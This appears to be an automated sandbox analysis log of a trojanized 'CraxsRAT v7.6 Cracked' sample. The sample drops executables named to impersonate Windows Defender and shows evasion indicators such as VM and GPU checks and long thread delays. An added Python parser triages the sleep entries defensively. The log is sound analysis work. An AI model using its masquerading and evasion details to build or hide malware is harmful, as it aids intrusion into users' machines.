Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: 6500000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: 82E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: A2E0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: AF70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: BF70000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: C0A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: D8A0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: DAF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: AF70000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: 10AF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: 16AF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: B400000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: BD10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: CD10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: E510000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: 222F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: 11510000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: 282F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: AF70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: EF70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 2FE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 4FE0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Memory allocated: 20F1FDE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Memory allocated: 20F39A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 1690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 32F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 52F0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 1360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 32C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 1660000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Memory allocated: 950000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Memory allocated: 1A680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 1200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 30F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Memory allocated: 1350000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Memory allocated: 1710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Memory allocated: 1B290000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Window / User API: threadDelayed 2873
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Window / User API: threadDelayed 4252
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Window / User API: threadDelayed 1249
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Window / User API: foregroundWindowGot 1720
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Window / User API: threadDelayed 4814
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Window / User API: threadDelayed 5015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7692
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1876
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6439
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1243
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1592
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe TID: 1480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe TID: 2360 Thread sleep time: -4252000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe TID: 2360 Thread sleep time: -1249000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe TID: 3116 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180 Thread sleep count: 6439 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3640 Thread sleep count: 1243 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1632 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748 Thread sleep count: 6790 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4712 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 Thread sleep count: 933 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4332 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe TID: 6168 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
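The thread-delay and thread-sleep entries above carry more structure than the flat listing shows. 922337203685477 is Int64.MaxValue in 100 ns ticks divided by 10,000, that is, the largest representable wait expressed in milliseconds, and the larger per-TID totals are exact integer multiples of it (2x, 3x, 5x and 6x): the sandbox is summing blocking, effectively unbounded waits per thread, which is what a worker thread parked on a wait handle looks like, not a timed sleep that outlasts the analysis. The entries that actually point at a sleep loop are the "Thread sleep count: 6439 > 30" style lines and finite totals such as 4252000 next to "threadDelayed 4252" (read together these look like 4252 one-second sleeps; that is an inference from the figures, not something the report states). The Python below is an added example, not part of the report or of the analysed sample, that parses lines of the shapes shown above and separates the two cases. The sample lines are copied from the report; the 30000 ms threshold is the one visible in the report's own ">= -30000s" comparisons.

```python
import re
from typing import List, NamedTuple, Optional

# Int64.MaxValue in 100 ns ticks, expressed in milliseconds. This is the
# figure the report prints for every "delay time: 922337203685477" entry.
INFINITE_MS = (2**63 - 1) // 10_000          # 922337203685477

# Sandbox threshold visible in the report's ">= -30000s" comparisons.
REPORT_THRESHOLD_MS = 30_000

# One regex for the three line shapes: "Thread sleep time", "Thread sleep
# count" and "Thread delayed". Anything after the number is ignored.
_LINE = re.compile(
    r"^Source: (?P<proc>.+?) (?:TID: (?P<tid>\d+) )?Thread "
    r"(?:sleep time: -(?P<ms>\d+)s"
    r"|sleep count: (?P<count>\d+)"
    r"|delayed: delay time: (?P<delay>\d+))"
)


class SleepEvent(NamedTuple):
    process: str
    tid: Optional[int]
    kind: str       # "infinite", "mixed", "finite" or "count"
    value: int      # milliseconds for time/delay lines, loop count for count lines
    multiple: int   # how many INFINITE_MS sentinels the reported total contains


def _classify_ms(total: int):
    multiple, residual = divmod(total, INFINITE_MS)
    if multiple and residual == 0:
        return "infinite", multiple       # only unbounded waits, summed
    if multiple:
        return "mixed", multiple          # unbounded waits plus a real sleep
    return "finite", 0


def classify(line: str) -> Optional[SleepEvent]:
    """Parse one report line; return None for lines of another shape."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    proc = m.group("proc").rsplit("\\", 1)[-1]   # keep the image name only
    tid = int(m.group("tid")) if m.group("tid") else None
    if m.group("count"):
        return SleepEvent(proc, tid, "count", int(m.group("count")), 0)
    total = int(m.group("ms") or m.group("delay"))
    kind, multiple = _classify_ms(total)
    return SleepEvent(proc, tid, kind, total, multiple)


def triage(lines: List[str]) -> List[SleepEvent]:
    return [e for e in (classify(l) for l in lines) if e is not None]


def sleep_loops(events: List[SleepEvent]) -> List[SleepEvent]:
    """Entries that indicate timing evasion: loops of many short sleeps, or a
    finite sleep total (after removing any infinite sentinels) above the
    sandbox's own threshold."""
    return [
        e for e in events
        if e.kind == "count"
        or (e.kind in ("finite", "mixed")
            and e.value - e.multiple * INFINITE_MS >= REPORT_THRESHOLD_MS)
    ]


# Constructed input: lines copied from the report above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe TID: 1480 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe TID: 2360 Thread sleep time: -4252000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe TID: 3116 Thread sleep time: -2767011611056431s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep time: -5534023222112862s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180 Thread sleep count: 6439 > 30",
    r"Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Thread delayed: delay time: 922337203685477",
]

if __name__ == "__main__":
    events = triage(SAMPLE_LINES)
    for e in events:
        print(e)
    print("sleep loops:", [(e.process, e.tid, e.kind, e.value) for e in sleep_loops(events)])
```

Run against the full report, only the powershell.exe sleep-count lines and the two finite totals from the Real Time Protection process survive the filter; every other entry in this block is an infinite-wait sentinel and should not be counted as evidence of sleep-based evasion.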
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: gBe3XYsV4oDQui+aRx3UrFHgfs1fic0Kn52gAbE1U8oRoxkPEGS449lSwjy9oOG6mpCuDTVk4kVL
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: KVMciNxbei79M7jaHiq0apTnxb14L4BwWcXmsJT3ShdGlGxLjI14udCHHq6xiiTbNTy2v3DTh/mB
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: wELPqEMugsOI9fRYfEvl9uhyQvTwr5nU68yLFBOZZCvz8CueGeOhB1OuN+zSZdTR7qQ0iQQnhJBj
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: FUC6ZMk3mh/cFeBcYt1kX0Yg9Ykx3WMHAv/mT1HudwzSgpvmciRytdEIRvXhRzJ5qXaWkSAfLvcf
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: 4jt7p+OSU8ch0NXYaFBkBAYMGlHgFS0RAgBtyXiFy9loda1WPycGJnijKluLqJi4SF79OE0h2Hn7
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: 4u9rlxLsHJnnp2wiQP6k0DgvVmciaqplDTFcCcE0dGfmHrr5Pd0XBkVa5pQHO7KShtZvabXEyd7l
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: fOXE8j+7bgE0ekcHQ5cZADYm2MD9RlUHXrGi6x7jDbF6OLBSOkMGN9vQfQBF9XlvmcIbE3AUPzOx
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: x+BJTVORr1fKhgfs9Al7TKsy4+THJ1XN8HM9fqTBSeqDyjr7L0PMUMW/FlLnf6n9FUlWegMlykqR
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4613166474.00000000010BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4613166474.00000000010BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX/
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: LRI6nD99xi+Wu0fMarE2q8+wl4AL7aRccWYuvId5p7Sv1TMEkVthgFS1kkr65UGcvJTCg7EXm5W+
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: bOGPUz2Z1G/QfdjFJo7QzHMMz4cfOwasT2P97ByonBdID73LKbCfus4zvmcIDN5wrTGbxLbgK5aU
